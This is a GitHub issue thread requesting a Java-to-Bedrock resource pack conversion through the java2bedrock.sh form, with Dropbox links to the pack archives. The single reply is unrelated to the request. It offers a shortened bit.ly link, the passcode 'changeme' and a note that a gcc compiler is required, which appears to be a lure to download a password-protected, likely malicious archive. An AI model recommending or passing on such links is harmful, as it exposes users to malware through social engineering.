### ISSUE TITLE
[Pack]: sdaassadsaddasasd

### ISSUE THREAD

**Issue by r-pixie** [Kas-tle/java2bedrock.sh#34063]
### Java Pack Direct Download URL

https://www.dropbox.com/scl/fi/4h8vuslvwfwb5e1yx5v7c/java.zip?rlkey=labbrz4cds2qvcvpu7m1lb6ts&st=wbran62p&dl=1

### Bedrock Merge Pack Direct Download URL

https://www.dropbox.com/scl/fi/mxhs14bx66f5ziwxr01nl/bedrock.zip?rlkey=eq8imjq0i5nl2hphv37qnt9sw&st=2ijlgr8i&dl=1

### Default Assets Version

None

### Block Material

None

### Attachable Material

None

### Archive Scratch Files

None

### Rename Model Files

true

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by afreisz** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
